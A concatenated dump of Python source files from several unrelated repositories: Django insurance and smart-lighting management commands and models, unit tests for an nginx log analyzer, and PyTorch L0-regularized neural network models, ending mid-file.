string_duration {str}
Raises:
InvalidDurationError
Returns:
Dict[str, DatetimeType] -- `start_time` and `end_time` are key
"""
try:
duration = {
TIME_UNITS[string_duration[-1]]: int(string_duration[:-1])
}
except (ValueError, IndexError, KeyError):
raise InvalidDurationError(
f'{string_duration=} is invalid as duration parameter'
)
end_time = datetime.now()
start_time = end_time - timedelta(**duration)
duraion_map = {
'start_time': start_time,
'end_time': end_time
}
return duraion_map
def color() -> str:
"""Choice a color
Returns:
str
"""
colors = [
Color.Red,
Color.Green,
Color.Yellow,
Color.Blue,
Color.Purple,
Color.Cyan
]
color = random.choice(colors)
return color
class Color:
Red = '\033[31m'
Green = '\033[32m'
Yellow = '\033[33m'
Blue = '\033[34m'
Purple = '\033[35m'
Cyan = '\033[36m'
class Accessory:
End = '\033[0m'
Accent = '\033[01m'
def processing(msg: str, end: str = '') -> None:
"""Display processing on terminal
Arguments:
msg {str}
Keyword Arguments:
end {str} - - (default: {''})
"""
processing_msg = f'{Accessory.Accent}{color()}{msg}{Accessory.End}{end}'
sys.stdout.write(processing_msg)
sys.stdout.flush()
``` |
{
"source": "1v1expert/MedAsk",
"score": 2
} |
#### File: management/commands/init_db.py
```python
from django.core.management.base import BaseCommand
from app.models import InsuranceData, InsuranceCompany
from app.choices import OMS, DMS
from django.contrib.auth.models import User
from django.db import models
from datetime import datetime
companies = [
{
'title': 'СК МЕД-АСКЕР',
'phone': '8 (495) 123-45-67'
},
{
'title': 'СК Рандеву',
'phone': '8 (499) 123-45-68'
},
{
'title': 'Страх-трах',
'phone': '8 (812) 123-45-69'
},
]
company_data = [
{
'policy_number': '1234 12345678',
'format_number': '4 8',
'type_of_insurance': DMS,
'expiration_date': '14.08.2020',
'company': 'СК МЕД-АСКЕР'
},
{
'policy_number': '9876 543210',
'format_number': '4 6',
'type_of_insurance': OMS,
'expiration_date': '15.08.2021',
'company': 'СК МЕД-АСКЕР'
},
{
'policy_number': '1234-123456-78',
'format_number': '4-6-2',
'type_of_insurance': DMS,
'expiration_date': '16.08.2022',
'company': 'СК Рандеву'
},
{
'policy_number': '98-76 5432-10',
'format_number': '2-2 4-2',
'type_of_insurance': OMS,
'expiration_date': '24.11.2023',
'company': 'С<NAME>у'
},
{
'policy_number': '12-341234-5678',
'format_number': '2-6-4',
'type_of_insurance': DMS,
'expiration_date': '25.11.2024',
'company': 'Страх-трах'
},
{
'policy_number': '9876-543210',
'format_number': '4-6',
'type_of_insurance': OMS,
'expiration_date': '26.11.2025',
'company': 'Страх-трах'
}
]
class Command(BaseCommand):
help = 'Database initialization'
def handle(self, *args, **options):
try:
user = User.objects.get(username="tech")
except models.ObjectDoesNotExist:
user = User.objects.create(username="tech", password="password", email="<EMAIL>")
user.save()
if InsuranceCompany.objects.exists():
return
objs = [
InsuranceCompany(
title=company['title'],
phone=company['phone'],
created_by=user,
updated_by=user
)
for company in companies
]
InsuranceCompany.objects.bulk_create(objs)
if InsuranceData.objects.exists():
return
objs_data = [
InsuranceData(
policy_number=data['policy_number'],
format_number=data['format_number'],
type_of_insurance=data['type_of_insurance'],
expiration_date=datetime.strptime(data['expiration_date'], '%d.%m.%Y').date(),
company=InsuranceCompany.objects.get(title=data['company']),
created_by=user,
updated_by=user
)
for data in company_data
]
InsuranceData.objects.bulk_create(objs_data)
```
#### File: MedAsk/app/models.py
```python
from django.db import models
from django.contrib.auth.models import User
from .choices import TYPES
# import uuid
class Base(models.Model):
"""
Абстрактная базовая модель
"""
# uid = models.UUIDField(verbose_name="Идентификатор", primary_key=True, default=uuid.uuid4, editable=False)
created_at = models.DateTimeField(auto_now_add=True, verbose_name="Когда создано")
created_by = models.ForeignKey(User, on_delete=models.PROTECT, verbose_name="Кем создано", editable=False, related_name="+")
updated_at = models.DateTimeField(auto_now=True, verbose_name="Когда обновлено")
updated_by = models.ForeignKey(User, on_delete=models.PROTECT, verbose_name="Кем обновлено", editable=False, related_name="+")
is_public = models.BooleanField("Опубликовано?", default=True)
deleted = models.BooleanField("В архиве?", default=False, editable=False)
class Meta:
abstract = True
verbose_name = "Базовая модель "
verbose_name_plural = "Базовые модели"
class InsuranceCompany(Base):
title = models.CharField(max_length=255, verbose_name='Наименование')
phone = models.CharField(max_length=20, verbose_name='Телефон')
cover = models.ImageField(upload_to='images/', null=True)
class Meta:
verbose_name = "Страховая компания"
verbose_name_plural = "Страховые компании"
def __str__(self):
return self.title
class InsuranceData(Base):
policy_number = models.CharField(verbose_name='Номер СП', max_length=255)
format_number = models.CharField(verbose_name='Формат СП', default=None, max_length=255)
type_of_insurance = models.CharField(max_length=4, choices=TYPES, verbose_name="Тип страхования")
expiration_date = models.DateField(verbose_name='Дата окончания')
company = models.ForeignKey(InsuranceCompany, on_delete=models.CASCADE)
def to_json(self):
return dict(
type_of_insurance=self.type_of_insurance,
expiration_date=self.expiration_date,
company_title=self.company.title,
company_phone=self.company.phone,
img=self.company.cover.url
)
class Meta:
verbose_name = "Данные по СК"
def __str__(self):
return 'Policy number: {}'.format(self.policy_number)
```
#### File: MedAsk/app/util.py
```python
def formalize_police_number(policy_number):
policy = []
i = 0
for cc, item in enumerate(policy_number):
if item.isdigit():
i += 1
else:
if i:
policy.append(str(i))
policy.append(item)
i = 0
else:
policy.append(item)
if cc == len(policy_number) - 1:
policy.append(str(i))
return ''.join(policy)
``` |
{
"source": "1v1expert/SmartLighting",
"score": 2
} |
#### File: management/commands/periodic_survey.py
```python
from django.core.management.base import BaseCommand
# from core.modbustcp.promodem.client import PromodemClient
from core.models import Promodem
from time import sleep
import logging
logger = logging.getLogger(__name__)
class Command(BaseCommand):
help = 'Periodic get data from devices'
def handle(self, *args, **options):
devices = Promodem.objects.all()
for device in devices:
client = device.get_client()
brightness = client.get_brightness()
wifi_signal = client.get_wifi_signal()
print(device, brightness, wifi_signal)
if brightness is not None:
client.brightness = brightness
device.brightness = brightness
device.save()
if wifi_signal is not None:
client.wifi_signal = wifi_signal
device.wifi_signal = wifi_signal
device.save()
```
#### File: management/commands/test_promodem.py
```python
from django.core.management.base import BaseCommand
from core.modbustcp.promodem.client import PromodemClient
from time import sleep
import logging
logger = logging.getLogger(__name__)
def turn_switch(host="192.168.2.55", bright=0, client=None):
if client is None:
client = PromodemClient(host=host, debug=False, auto_close=False)
client.set_brightness(bright)
# print(client.get_full_info())
logger.info(client.get_full_info())
return client
class Command(BaseCommand):
help = 'Generates Fake data'
def handle(self, *args, **options):
client = turn_switch(host="192.168.2.55", bright=0)
client2 = turn_switch(host="192.168.2.66", bright=0)
# print(client.close())
sleep(1)
turn_switch(bright=0, client=client)
turn_switch(bright=1, client=client2)
sleep(1)
turn_switch(bright=1, client=client)
turn_switch(bright=0, client=client2)
sleep(1)
turn_switch(bright=1, client=client)
turn_switch(bright=1, client=client2)
sleep(1)
turn_switch(bright=0, client=client)
turn_switch(bright=0, client=client2)
sleep(1)
turn_switch(bright=1, client=client)
turn_switch(bright=1, client=client2)
print('GET: {}, WRITE: {}'.format(client.count_get + client2.count_get, client.count_write + client2.count_get))
print(client.close())
print(client2.close())
# client = PromodemClient(host="192.168.1.42", debug=False)
# client.set_brightness(1)
# print(client.get_full_info())
#
# client.set_voltage_inversion(0)
# print(client.get_full_info())
``` |
{
"source": "1vank1n/otus-python-21",
"score": 2
} |
#### File: otus-python-21/hw1/tests.py
```python
import gzip
import json
import logging
import os
import shutil
import tempfile
import unittest
from datetime import datetime
import log_analyzer
CONFIG = {
'REPORT_SIZE': 1000,
'REPORT_DIR': './reports',
'LOG_DIR': './log',
'SUPPORTED_LOG_FORMATS': ['', '.gz'],
'TERMINATED_PERCENT': 100,
'LOGGING_FILE': None,
'LOGGING_FORMAT': '[%(asctime)s] %(levelname).1s %(message)s',
}
class LogAnalyzerTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.test_log_dir = tempfile.mkdtemp()
cls.test_wrong_log_dir = tempfile.mkdtemp()
cls.test_report_dir = tempfile.mkdtemp()
cls.config = log_analyzer.get_config(
config_dict={
'LOG_DIR': cls.test_log_dir,
'REPORT_DIR': cls.test_report_dir,
})
cls.logger = logging.getLogger()
open(f'{cls.test_log_dir}/nginx-access-ui.log-20210223.gz', 'w').close()
open(f'{cls.test_log_dir}/nginx-access-ui.log-20210224.gz', 'w').close()
open(f'{cls.test_log_dir}/nginx-access-ui.log-20210225.gz', 'w').close()
open(f'{cls.test_log_dir}/nginx-access-ui.log-20210226.gz', 'w').close()
open(f'{cls.test_log_dir}/nginx-access-ui.log-20210227.gz', 'w').close()
open(f'{cls.test_log_dir}/nginx-access-ui.log-20210228.gz', 'w').close()
open(f'{cls.test_log_dir}/nginx-access-ui.log-20210299.gz', 'w').close()
open(f'{cls.test_log_dir}/nginx-access-ui.log-20210399.gz', 'w').close()
cls.last_log_filename = f'{cls.test_log_dir}/nginx-access-ui.log-20210301.gz'
cls.COUNT_LINES = 100
cls.REQUEST_TIME = 555
with gzip.open(cls.last_log_filename, 'wb') as f:
line = f'172.16.31.10 - - [29/Jun/2017:03:50:22 +0300] "GET /api/v2/banner/25019354 HTTP/1.1" 200 927 "-" "Lynx/2.8.8dev.9 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/2.10.5" "-" "1498697422-2190034393-4708-9752759" "dc7161be3" {cls.REQUEST_TIME}\n'
for _ in range(cls.COUNT_LINES):
f.write(str.encode(line))
@classmethod
def tearDownClass(cls):
shutil.rmtree(cls.test_log_dir)
shutil.rmtree(cls.test_wrong_log_dir)
shutil.rmtree(cls.test_report_dir)
def tearDown(self):
report_path = f'{self.test_report_dir}/report-2021.03.01.html'
if os.path.exists(report_path):
os.remove(report_path)
def test_get_config(self):
new_config = {
'REPORT_SIZE': 25,
'REPORT_DIR': './reports_new',
'LOG_DIR': './log_new',
'SUPPORTED_LOG_FORMATS': ['', '.gz', '.bz2'],
'TERMINATED_PERCENT': 25,
'NEW_KEY': 'new_value',
}
updated_config = log_analyzer.get_config(config_dict=new_config)
for key in new_config.keys():
self.assertEqual(updated_config[key], new_config[key])
def test_generate_report_filename(self):
log_filename = 'nginx-test-log.gz'
date = datetime(2021, 3, 1)
log_fileinfo = log_analyzer.Fileinfo(
path=os.path.join(self.config['LOG_DIR'], log_filename),
date=date,
extension='.gz',
)
report_fileinfo = log_analyzer.generate_report_filename(
config=self.config,
log_fileinfo=log_fileinfo,
)
self.assertEqual(report_fileinfo['path'], f'{self.test_report_dir}/report-2021.03.01.html')
self.assertEqual(report_fileinfo['date'], date)
self.assertEqual(report_fileinfo['extension'], '.html')
def test_find_log(self):
log_fileinfo = log_analyzer.find_log(config=self.config, logger=self.logger)
self.assertEqual(log_fileinfo['path'], self.last_log_filename)
self.assertEqual(log_fileinfo['date'], datetime(2021, 3, 1))
self.assertEqual(log_fileinfo['extension'], '.gz')
with self.assertRaises(FileNotFoundError):
"""Check wrong log dir"""
config = log_analyzer.get_config(
config_dict={'LOG_DIR': f'{self.test_log_dir}/wrong_path'})
log_analyzer.find_log(config=config, logger=self.logger)
with self.assertRaises(SystemExit):
"""Check dir without log"""
config = log_analyzer.get_config(config_dict={'LOG_DIR': self.test_wrong_log_dir})
log_analyzer.find_log(config=config, logger=self.logger)
def test_check_is_exist_report(self):
report_path = f'{self.test_report_dir}/report-2021.03.01.html'
date = datetime(2021, 3, 1)
log_fileinfo = log_analyzer.Fileinfo(
path=os.path.join(self.config['LOG_DIR'], 'nginx-access-ui.log-20210301.gz'),
date=date,
extension='.gz',
)
with self.assertRaises(SystemExit):
"""Check already generated report"""
open(report_path, 'w').close()
log_analyzer.check_is_exist_report(
config=self.config,
log_fileinfo=log_fileinfo,
logger=self.logger,
)
def test_parse_log(self):
log_fileinfo = log_analyzer.find_log(config=self.config, logger=self.logger)
parsed_log = log_analyzer.parse_log(
config=self.config,
log_fileinfo=log_fileinfo,
logger=self.logger,
)
self.assertEqual(parsed_log['total_count'], self.COUNT_LINES)
self.assertEqual(parsed_log['total_time'], self.COUNT_LINES * self.REQUEST_TIME)
self.assertEqual(len(parsed_log['parsed_lines']), self.COUNT_LINES)
self.assertEqual(parsed_log['parsed_lines'][0]['request_time'], self.REQUEST_TIME)
def test_process_log(self):
log_fileinfo = log_analyzer.find_log(config=self.config, logger=self.logger)
parsed_log = log_analyzer.parse_log(
config=self.config,
log_fileinfo=log_fileinfo,
logger=self.logger,
)
processed_log = log_analyzer.process_log(config=self.config, parsed_log=parsed_log)
self.assertEqual(processed_log['total_count'], self.COUNT_LINES)
self.assertEqual(processed_log['total_time'], self.COUNT_LINES * self.REQUEST_TIME)
self.assertEqual(len(processed_log['data'].items()), 1)
processed_line = list(processed_log['data'].values())[0]
self.assertEqual(processed_line['time_sum'], self.COUNT_LINES * self.REQUEST_TIME)
def test_generate_report(self):
TOTAL_COUNT = 1
TIME = 5.0
PROCESSED_LINE = log_analyzer.ProcessedLine(
url='/test-url/',
count=TOTAL_COUNT,
time_sum=TIME,
time_avg=TIME,
time_max=TIME,
time_list=[TIME, TIME],
)
DATA = {'/test-url/': PROCESSED_LINE}
log_fileinfo = log_analyzer.find_log(config=self.config, logger=self.logger)
processed_log = log_analyzer.ProcessedLog(
total_count=1,
total_time=5,
data=DATA,
)
with self.assertRaises(SystemExit):
"""Check that report.html not found"""
log_analyzer.generate_report(
config=self.config,
processed_log=processed_log,
log_fileinfo=log_fileinfo,
logger=self.logger,
)
report_template_path = os.path.join(self.config['REPORT_DIR'], 'report.html')
report_template_content = '$table_json'
with open(report_template_path, 'w') as f:
f.write(report_template_content)
log_analyzer.generate_report(
config=self.config,
processed_log=processed_log,
log_fileinfo=log_fileinfo,
logger=self.logger,
)
table_json = json.dumps(
[
{
'url': PROCESSED_LINE['url'],
'count': PROCESSED_LINE['count'],
'count_perc': 100.0,
'time_sum': PROCESSED_LINE['time_sum'],
'time_perc': 100.0,
'time_avg': PROCESSED_LINE['time_avg'],
'time_max': PROCESSED_LINE['time_max'],
'time_med': TIME,
}
])
report_fileinfo = log_analyzer.generate_report_filename(
config=self.config,
log_fileinfo=log_fileinfo,
)
with open(report_fileinfo['path'], 'r') as f:
line = f.read()
self.assertEqual(line, table_json)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "1vn/L0_regularization",
"score": 2
} |
#### File: 1vn/L0_regularization/models.py
```python
import torch
import torch.nn as nn
from l0_layers import L0Conv2d, L0Dense, TDConv2d
from base_layers import MAPConv2d, MAPDense
from utils import get_flat_fts
from copy import deepcopy
import torch.nn.functional as F
class L0MLP(nn.Module):
def __init__(self, input_dim, num_classes, layer_dims=(300, 100), N=50000, beta_ema=0.999,
weight_decay=1, lambas=(1., 1., 1.), local_rep=False, temperature=2./3.):
super(L0MLP, self).__init__()
self.layer_dims = layer_dims
self.input_dim = input_dim
self.N = N
self.beta_ema = beta_ema
self.weight_decay = self.N * weight_decay
self.lambas = lambas
layers = []
for i, dimh in enumerate(self.layer_dims):
inp_dim = self.input_dim if i == 0 else self.layer_dims[i - 1]
droprate_init, lamba = 0.2 if i == 0 else 0.5, lambas[i] if len(lambas) > 1 else lambas[0]
layers += [L0Dense(inp_dim, dimh, droprate_init=droprate_init, weight_decay=self.weight_decay,
lamba=lamba, local_rep=local_rep, temperature=temperature), nn.ReLU()]
layers.append(L0Dense(self.layer_dims[-1], num_classes, droprate_init=0.5, weight_decay=self.weight_decay,
lamba=lambas[-1], local_rep=local_rep, temperature=temperature))
self.output = nn.Sequential(*layers)
self.layers = []
for m in self.modules():
if isinstance(m, L0Dense):
self.layers.append(m)
if beta_ema > 0.:
print('Using temporal averaging with beta: {}'.format(beta_ema))
self.avg_param = deepcopy(list(p.data for p in self.parameters()))
if torch.cuda.is_available():
self.avg_param = [a.cuda() for a in self.avg_param]
self.steps_ema = 0.
def forward(self, x):
return self.output(x)
def regularization(self):
regularization = 0.
for layer in self.layers:
regularization += - (1. / self.N) * layer.regularization()
if torch.cuda.is_available():
regularization = regularization.cuda()
return regularization
def get_exp_flops_l0(self):
expected_flops, expected_l0 = 0., 0.
for layer in self.layers:
e_fl, e_l0 = layer.count_expected_flops_and_l0()
expected_flops += e_fl
expected_l0 += e_l0
return expected_flops, expected_l0
def update_ema(self):
self.steps_ema += 1
for p, avg_p in zip(self.parameters(), self.avg_param):
avg_p.mul_(self.beta_ema).add_((1 - self.beta_ema) * p.data)
def load_ema_params(self):
for p, avg_p in zip(self.parameters(), self.avg_param):
p.data.copy_(avg_p / (1 - self.beta_ema**self.steps_ema))
def load_params(self, params):
for p, avg_p in zip(self.parameters(), params):
p.data.copy_(avg_p)
def get_params(self):
params = deepcopy(list(p.data for p in self.parameters()))
return params
class L0LeNet5(nn.Module):
def __init__(self, num_classes, input_size=(1, 28, 28), conv_dims=(20, 50), fc_dims=500,
N=50000, beta_ema=0., weight_decay=1, lambas=(1., 1., 1., 1.), local_rep=False,
temperature=2./3.):
super(L0LeNet5, self).__init__()
self.N = N
assert(len(conv_dims) == 2)
self.conv_dims = conv_dims
self.fc_dims = fc_dims
self.beta_ema = beta_ema
self.weight_decay = weight_decay
convs = [L0Conv2d(input_size[0], conv_dims[0], 5, droprate_init=0.5, temperature=temperature,
weight_decay=self.weight_decay, lamba=lambas[0], local_rep=local_rep),
nn.ReLU(), nn.MaxPool2d(2),
L0Conv2d(conv_dims[0], conv_dims[1], 5, droprate_init=0.5, temperature=temperature,
weight_decay=self.weight_decay, lamba=lambas[1], local_rep=local_rep),
nn.ReLU(), nn.MaxPool2d(2)]
self.convs = nn.Sequential(*convs)
if torch.cuda.is_available():
self.convs = self.convs.cuda()
flat_fts = get_flat_fts(input_size, self.convs)
fcs = [L0Dense(flat_fts, self.fc_dims, droprate_init=0.5, weight_decay=self.weight_decay,
lamba=lambas[2], local_rep=local_rep, temperature=temperature), nn.ReLU(),
L0Dense(self.fc_dims, num_classes, droprate_init=0.5, weight_decay=self.weight_decay,
lamba=lambas[3], local_rep=local_rep, temperature=temperature)]
self.fcs = nn.Sequential(*fcs)
self.layers = []
for m in self.modules():
if isinstance(m, L0Dense) or isinstance(m, L0Conv2d):
self.layers.append(m)
if beta_ema > 0.:
print('Using temporal averaging with beta: {}'.format(beta_ema))
self.avg_param = deepcopy(list(p.data for p in self.parameters()))
if torch.cuda.is_available():
self.avg_param = [a.cuda() for a in self.avg_param]
self.steps_ema = 0.
def forward(self, x):
o = self.convs(x)
o = o.view(o.size(0), -1)
return self.fcs(o)
def regularization(self):
regularization = 0.
for layer in self.layers:
regularization += - (1. / self.N) * layer.regularization()
if torch.cuda.is_available():
regularization = regularization.cuda()
return regularization
def get_exp_flops_l0(self):
expected_flops, expected_l0 = 0., 0.
for layer in self.layers:
e_fl, e_l0 = layer.count_expected_flops_and_l0()
expected_flops += e_fl
expected_l0 += e_l0
return expected_flops, expected_l0
def update_ema(self):
self.steps_ema += 1
for p, avg_p in zip(self.parameters(), self.avg_param):
avg_p.mul_(self.beta_ema).add_((1 - self.beta_ema) * p.data)
def load_ema_params(self):
for p, avg_p in zip(self.parameters(), self.avg_param):
p.data.copy_(avg_p / (1 - self.beta_ema**self.steps_ema))
def load_params(self, params):
for p, avg_p in zip(self.parameters(), params):
p.data.copy_(avg_p)
def get_params(self):
params = deepcopy(list(p.data for p in self.parameters()))
return params
class BasicBlock(nn.Module):
def __init__(self, in_planes, out_planes, stride, droprate_init=0.0, weight_decay=0., lamba=0.01, local_rep=False,
temperature=2./3.):
super(BasicBlock, self).__init__()
self.bn1 = nn.BatchNorm2d(in_planes)
self.conv1 = L0Conv2d(in_planes, out_planes, kernel_size=3, stride=1, padding=1, bias=False,
droprate_init=droprate_init, weight_decay=weight_decay / (1 - 0.3), local_rep=local_rep,
lamba=lamba, temperature=temperature)
self.bn2 = nn.BatchNorm2d(out_planes)
self.conv2 = MAPConv2d(out_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False,
weight_decay=weight_decay)
self.equalInOut = (in_planes == out_planes)
self.convShortcut = (not self.equalInOut) and \
MAPConv2d(in_planes, out_planes, kernel_size=1, stride=stride, padding=0, bias=False,
weight_decay=weight_decay) or None
def prune(self, botk):
self.conv1.prune(botk)
def forward(self, x):
if not self.equalInOut:
x = F.relu(self.bn1(x))
else:
out = F.relu(self.bn1(x))
out = self.conv1(out if self.equalInOut else x)
out = self.conv2(F.relu(self.bn2(out)))
return torch.add(out, x if self.equalInOut else self.convShortcut(x))
class NetworkBlock(nn.Module):
def __init__(self, nb_layers, in_planes, out_planes, block, stride, droprate_init=0.0, weight_decay=0., lamba=0.01,
local_rep=False, temperature=2./3.):
super(NetworkBlock, self).__init__()
self.layer = self._make_layer(block, in_planes, out_planes, nb_layers, stride, droprate_init,
weight_decay=weight_decay, lamba=lamba, local_rep=local_rep,
temperature=temperature)
def _make_layer(self, block, in_planes, out_planes, nb_layers, stride, droprate_init,
weight_decay=0., lamba=0.01, local_rep=False, temperature=2./3.):
layers = []
for i in range(nb_layers):
layers.append(block(i == 0 and in_planes or out_planes, out_planes, i == 0 and stride or 1,
droprate_init, weight_decay))
return nn.Sequential(*layers)
def forward(self, x):
return self.layer(x)
def prune(self, botk):
new_layers = []
for layer in self.layer:
layer.prune(botk)
new_layers.append(layer)
self.layer = nn.Sequential(*new_layers)
class TDNetworkBlock(nn.Module):
def __init__(self, nb_layers, in_planes, out_planes, block, stride, droprate_init=0.0, weight_decay=0., lamba=0.01,
local_rep=False, temperature=2./3., dropout=0.5, dropout_botk=0.5, dropout_type="weight"):
super(TDNetworkBlock, self).__init__()
self.layer = self._make_layer(block, in_planes, out_planes, nb_layers, stride, droprate_init,
weight_decay=weight_decay, lamba=lamba, local_rep=local_rep,
temperature=temperature, dropout=dropout, dropout_botk=dropout_botk, dropout_type=dropout_type)
def _make_layer(self, block, in_planes, out_planes, nb_layers, stride, droprate_init,
weight_decay=0., lamba=0.01, local_rep=False, temperature=2./3., dropout=0.5, dropout_botk=0.5, dropout_type="weight"):
layers = []
for i in range(nb_layers):
layers.append(block(i == 0 and in_planes or out_planes, out_planes, i == 0 and stride or 1,
droprate_init, weight_decay, dropout=dropout, dropout_botk=dropout_botk, dropout_type=dropout_type))
return nn.Sequential(*layers)
def forward(self, x):
return self.layer(x)
def prune(self, botk):
new_layers = []
for layer in self.layer:
layer.prune(botk)
new_layers.append(layer)
self.layer = nn.Sequential(*new_layers)
class L0WideResNet(nn.Module):
def __init__(self, depth, num_classes, widen_factor=1, droprate_init=0.3, N=50000, beta_ema=0.99,
weight_decay=5e-4, local_rep=False, lamba=0.01, temperature=2./3.):
super(L0WideResNet, self).__init__()
nChannels = [16, 16*widen_factor, 32*widen_factor, 64*widen_factor]
assert((depth - 4) % 6 == 0)
self.n = (depth - 4) // 6
self.N = N
self.beta_ema = beta_ema
block = BasicBlock
self.weight_decay = N * weight_decay
self.lamba = lamba
# 1st conv before any network block
self.conv1 = MAPConv2d(3, nChannels[0], kernel_size=3, stride=1, padding=1, bias=False,
weight_decay=self.weight_decay)
# 1st block
self.block1 = NetworkBlock(self.n, nChannels[0], nChannels[1], block, 1, droprate_init, self.weight_decay,
self.lamba, local_rep=local_rep, temperature=temperature)
# 2nd block
self.block2 = NetworkBlock(self.n, nChannels[1], nChannels[2], block, 2, droprate_init, self.weight_decay,
self.lamba, local_rep=local_rep, temperature=temperature)
# 3rd block
self.block3 = NetworkBlock(self.n, nChannels[2], nChannels[3], block, 2, droprate_init, self.weight_decay,
self.lamba, local_rep=local_rep, temperature=temperature)
# bn, relu and classifier
self.bn = nn.BatchNorm2d(nChannels[3])
self.fcout = MAPDense(nChannels[3], num_classes, weight_decay=self.weight_decay)
self.layers, self.bn_params = [], []
for m in self.modules():
if isinstance(m, MAPDense) or isinstance(m, MAPConv2d) or isinstance(m, L0Conv2d):
self.layers.append(m)
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
self.bn_params += [m.weight, m.bias]
if beta_ema > 0.:
print('Using temporal averaging with beta: {}'.format(beta_ema))
self.avg_param = deepcopy(list(p.data for p in self.parameters()))
if torch.cuda.is_available():
self.avg_param = [a.cuda() for a in self.avg_param]
self.steps_ema = 0.
print('Using weight decay: {}'.format(self.weight_decay))
def forward(self, x):
out = self.conv1(x)
out = self.block1(out)
out = self.block2(out)
out = self.block3(out)
out = F.relu(self.bn(out))
out = F.avg_pool2d(out, 8)
out = out.view(out.size(0), -1)
return self.fcout(out)
def regularization(self):
regularization = 0.
for layer in self.layers:
regularization += - (1. / self.N) * layer.regularization()
for bnw in self.bn_params:
if self.weight_decay > 0:
regularization += (self.weight_decay / self.N) * .5 * torch.sum(bnw.pow(2))
if torch.cuda.is_available():
regularization = regularization.cuda()
return regularization
def prune(self, botk):
self.block1.prune(botk)
self.block2.prune(botk)
self.block3.prune(botk)
def get_exp_flops_l0(self):
expected_flops, expected_l0 = 0., 0.
for layer in self.layers:
try:
e_fl, e_l0 = layer.count_expected_flops_and_l0()
expected_flops += e_fl
expected_l0 += e_l0
except:
pass
return expected_flops, expected_l0
def update_ema(self):
self.steps_ema += 1
for p, avg_p in zip(self.parameters(), self.avg_param):
avg_p.mul_(self.beta_ema).add_((1 - self.beta_ema) * p.data)
def load_ema_params(self):
for p, avg_p in zip(self.parameters(), self.avg_param):
p.data.copy_(avg_p / (1 - self.beta_ema**self.steps_ema))
def load_params(self, params):
for p, avg_p in zip(self.parameters(), params):
p.data.copy_(avg_p)
def get_params(self):
params = deepcopy(list(p.data for p in self.parameters()))
return params
class TDBasicBlock(nn.Module):
def __init__(self, in_planes, out_planes, stride, droprate_init=0.0, weight_decay=0., lamba=0.01, local_rep=False,
temperature=2./3., dropout=0.5, dropout_botk=0.5, dropout_type="weight"):
super(TDBasicBlock, self).__init__()
self.bn1 = nn.BatchNorm2d(in_planes, eps=0.001, momentum=0.997)
self.conv1 = TDConv2d(in_planes, out_planes, kernel_size=3, stride=1, padding=1, bias=False,
droprate_init=droprate_init, weight_decay=weight_decay / (1 - 0.3), local_rep=local_rep,
lamba=lamba, temperature=temperature, dropout=dropout, dropout_botk=dropout_botk, dropout_type=dropout_type)
self.bn2 = nn.BatchNorm2d(out_planes, eps=0.001, momentum=0.997)
self.conv2 = MAPConv2d(out_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False,
weight_decay=weight_decay)
self.equalInOut = (in_planes == out_planes)
self.convShortcut = (not self.equalInOut) and \
MAPConv2d(in_planes, out_planes, kernel_size=1, stride=stride, padding=0, bias=False,
weight_decay=weight_decay) or None
def prune(self, botk):
self.conv1.prune(botk)
def forward(self, x):
# print("block pre relu: ", x)
if not self.equalInOut:
x = self.bn1(x)
# print("x_bn:", x)
x = F.relu(x)
# print("x_relu:", x)
else:
out = self.bn1(x)
# print("out_bn:", out)
out = F.relu(out)
# print("out_relu:", out)
# print("block conv1 in: ", out if self.equalInOut else x)
out = self.conv1(out if self.equalInOut else x)
# print("block conv1 out: ", out)
out = self.conv2(F.relu(self.bn2(out)))
# print("block conv2 out: ", out)
return torch.add(out, x if self.equalInOut else self.convShortcut(x))
class TDWideResNet(nn.Module):
def __init__(self, depth, num_classes, widen_factor=1, droprate_init=0.3, N=50000, beta_ema=0.99,
weight_decay=5e-4, local_rep=False, lamba=0.01, temperature=2./3., dropout=0.5, dropout_botk=0.5, dropout_type="weight"):
super(TDWideResNet, self).__init__()
nChannels = [16, 16*widen_factor, 32*widen_factor, 64*widen_factor]
assert((depth - 4) % 6 == 0)
self.n = (depth - 4) // 6
self.N = N
self.beta_ema = beta_ema
block = TDBasicBlock
self.weight_decay = 0.001
self.lamba = lamba
# 1st conv before any network block
self.conv1 = MAPConv2d(3, nChannels[0], kernel_size=3, stride=1, padding=1, bias=False,
weight_decay=self.weight_decay)
# 1st block
self.block1 = TDNetworkBlock(self.n, nChannels[0], nChannels[1], block, 1, droprate_init, self.weight_decay,
self.lamba, local_rep=local_rep, temperature=temperature, dropout=dropout, dropout_botk=dropout_botk, dropout_type=dropout_type)
# 2nd block
self.block2 = TDNetworkBlock(self.n, nChannels[1], nChannels[2], block, 2, droprate_init, self.weight_decay,
self.lamba, local_rep=local_rep, temperature=temperature, dropout=dropout, dropout_botk=dropout_botk, dropout_type=dropout_type)
# 3rd block
self.block3 = TDNetworkBlock(self.n, nChannels[2], nChannels[3], block, 2, droprate_init, self.weight_decay,
self.lamba, local_rep=local_rep, temperature=temperature, dropout=dropout, dropout_botk=dropout_botk, dropout_type=dropout_type)
# bn, relu and classifier
self.bn = nn.BatchNorm2d(nChannels[3])
self.fcout = MAPDense(nChannels[3], num_classes, weight_decay=self.weight_decay)
self.layers, self.bn_params = [], []
for m in self.modules():
if isinstance(m, MAPDense) or isinstance(m, MAPConv2d) or isinstance(m, L0Conv2d):
self.layers.append(m)
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
self.bn_params += [m.weight, m.bias]
print('Using weight decay: {}'.format(self.weight_decay))
def forward(self, x):
out = self.conv1(x)
#print("covn1 out:", out)
out = self.block1(out)
#print("block1 out:", out)
out = self.block2(out)
#print("block2 out:", out)
out = self.block3(out)
#print("block3 out:", out)
out = F.relu(self.bn(out))
#print("relu out:", out)
out = F.avg_pool2d(out, 8)
#print("pooling:", out)
out = out.view(out.size(0), -1)
#print("resnet forward out:", out)
return self.fcout(out)
def prune(self, botk):
self.block1.prune(botk)
self.block2.prune(botk)
self.block3.prune(botk)
def regularization(self):
regularization = 0.
for layer in self.layers:
regularization += layer.regularization()
if torch.cuda.is_available():
regularization = regularization.cuda()
return regularization
def get_exp_flops_l0(self):
expected_flops, expected_l0 = 0., 0.
for layer in self.layers:
try:
e_fl, e_l0 = layer.count_expected_flops_and_l0()
expected_flops += e_fl
expected_l0 += e_l0
except:
pass
return expected_flops, expected_l0
def load_params(self, params):
